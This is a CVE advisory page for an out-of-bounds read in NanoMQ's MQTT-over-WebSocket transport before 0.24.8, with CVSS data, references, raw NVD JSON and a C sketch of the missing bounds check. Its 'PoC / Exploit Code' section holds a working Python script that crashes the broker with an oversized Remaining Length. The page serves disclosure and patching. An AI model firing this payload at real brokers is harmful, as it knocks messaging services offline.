Security Vulnerability Report
CVE-2026-25627 CVSS 6.5 MEDIUM

CVE-2026-25627

Published: 2026-03-30 21:17:08
Last Modified: 2026-04-02 15:33:55

Description

NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. Prior to version 0.24.8, NanoMQ’s MQTT-over-WebSocket transport can be crashed by sending an MQTT packet with a deliberately large Remaining Length in the fixed header while providing a much shorter actual payload. The code path copies Remaining Length bytes without verifying that the current receive buffer contains that many bytes, resulting in an out-of-bounds read (ASAN reports OOB / crash). This is remotely triggerable over the WebSocket listener. This issue has been patched in version 0.24.8.
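The missing check described above, as an added illustration (not NanoMQ or NanoNNG code): the function names are hypothetical, the sample bytes are constructed, and it assumes one complete MQTT packet arrives per WebSocket message. The declared Remaining Length is decoded and compared with the bytes actually received before anything is copied.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Decode an MQTT Variable Byte Integer starting at buf[0].
 * Returns the number of bytes consumed (1..4), or 0 if truncated/malformed. */
static size_t decode_varint(const uint8_t *buf, size_t len, uint32_t *value)
{
    uint32_t v = 0;
    for (size_t i = 0; i < 4 && i < len; i++) {
        v |= (uint32_t)(buf[i] & 0x7F) << (7 * i);
        if ((buf[i] & 0x80) == 0) {
            *value = v;
            return i + 1;
        }
    }
    return 0; /* ran out of bytes, or a fifth length byte would be needed */
}

/* Copy the body of one MQTT packet out of a received WebSocket message.
 * Returns the number of bytes copied, or -1 if the frame must be rejected.
 * The unsafe pattern is memcpy(dst, msg + hdr, remaining) with no check
 * that msg really holds `remaining` more bytes after the fixed header. */
long copy_mqtt_body(const uint8_t *msg, size_t msg_len,
                    uint8_t *dst, size_t dst_cap)
{
    uint32_t remaining = 0;
    size_t n = msg_len < 2 ? 0 : decode_varint(msg + 1, msg_len - 1, &remaining);
    if (n == 0)
        return -1;
    size_t hdr = 1 + n; /* type byte + length bytes; hdr <= msg_len here */
    /* The declared length must fit in what was received and in dst. */
    if (remaining > msg_len - hdr || remaining > dst_cap)
        return -1;
    memcpy(dst, msg + hdr, remaining);
    return (long)remaining;
}

int main(void)
{
    /* Constructed sample: type 0x10, Remaining Length 268435455, no body. */
    const uint8_t lying[] = { 0x10, 0xFF, 0xFF, 0xFF, 0x7F };
    uint8_t out[64];
    printf("%ld\n", copy_mqtt_body(lying, sizeof lying, out, sizeof out));
    return 0;
}
```

A transport that reassembles packets across several messages would buffer and wait for more data instead of rejecting a short frame; the comparison against the bytes in hand stays the same.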

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:emqx:nanomq:*:*:*:*:*:*:*:* - VULNERABLE
NanoMQ < 0.24.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import asyncio
import websockets


async def send_malicious_packet(uri):
    """
    PoC for CVE-2026-25627
    Sends a malicious MQTT packet with a large Remaining Length to NanoMQ.
    """
    try:
        async with websockets.connect(uri) as websocket:
            # Construct a malicious MQTT packet
            # Byte 1: MQTT Packet Type (e.g., 0x10 for CONNECT)
            # Byte 2-5: Remaining Length encoded as a very large value (0xFF, 0xFF, 0xFF, 0x7F)
            # This indicates ~268MB of data, but we send very little payload.
            packet_type = b'\x10'
            # Variable Byte Integer for Remaining Length (Max value ~268 million)
            remaining_length = b'\xFF\xFF\xFF\x7F'
            # Minimal payload to trigger OOB read
            payload = b''
            malicious_packet = packet_type + remaining_length + payload
            print(f"[+] Sending malicious packet to {uri}...")
            await websocket.send(malicious_packet)
            # Try to receive response (server likely crashes)
            response = await websocket.recv()
            print(f"[!] Received response (unexpected): {response}")
    except Exception as e:
        print(f"[!] Exception occurred (Crash expected): {e}")


if __name__ == "__main__":
    # Target URI (default NanoMQ WebSocket port is usually 8083)
    target_uri = "ws://localhost:8083/mqtt"
    asyncio.run(send_malicious_packet(target_uri))

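References

https://github.com/nanomq/NanoNNG/commit/e80b30bad6d855593a68d18f2785bfaca6faf09e (Patch)
https://github.com/nanomq/NanoNNG/pull/1405 (Issue Tracking, Patch)
https://github.com/nanomq/nanomq/releases/tag/0.24.8 (Release Notes)
https://github.com/nanomq/nanomq/security/advisories/GHSA-w4rh-v3h2-j29x (Exploit, Vendor Advisory)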

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-25627",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-30T21:17:07.750",
    "lastModified": "2026-04-02T15:33:55.340",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. Prior to version 0.24.8, NanoMQ’s MQTT-over-WebSocket transport can be crashed by sending an MQTT packet with a deliberately large Remaining Length in the fixed header while providing a much shorter actual payload. The code path copies Remaining Length bytes without verifying that the current receive buffer contains that many bytes, resulting in an out-of-bounds read (ASAN reports OOB / crash). This is remotely triggerable over the WebSocket listener. This issue has been patched in version 0.24.8."},
      {"lang": "es", "value": "NanoMQ MQTT Broker (NanoMQ) es una plataforma de mensajería de borde integral. Antes de la versión 0.24.8, el transporte MQTT-over-WebSocket de NanoMQ puede colapsar al enviar un paquete MQTT con una longitud restante (Remaining Length) deliberadamente grande en la cabecera fija mientras se proporciona una carga útil real mucho más corta. La ruta del código copia bytes de la longitud restante sin verificar que el búfer de recepción actual contenga esa cantidad de bytes, lo que resulta en una lectura fuera de límites (ASAN informa OOB / fallo). Esto puede ser activado remotamente a través del oyente de WebSocket. Este problema ha sido parcheado en la versión 0.24.8."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:emqx:nanomq:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.24.8", "matchCriteriaId": "5BCF33DD-E338-4F9C-BA28-CC3F585079AF"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/nanomq/NanoNNG/commit/e80b30bad6d855593a68d18f2785bfaca6faf09e", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/nanomq/NanoNNG/pull/1405", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]},
      {"url": "https://github.com/nanomq/nanomq/releases/tag/0.24.8", "source": "[email protected]", "tags": ["Release Notes"]},
      {"url": "https://github.com/nanomq/nanomq/security/advisories/GHSA-w4rh-v3h2-j29x", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]},
      {"url": "https://github.com/nanomq/nanomq/security/advisories/GHSA-w4rh-v3h2-j29x", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}
    ]
  }
}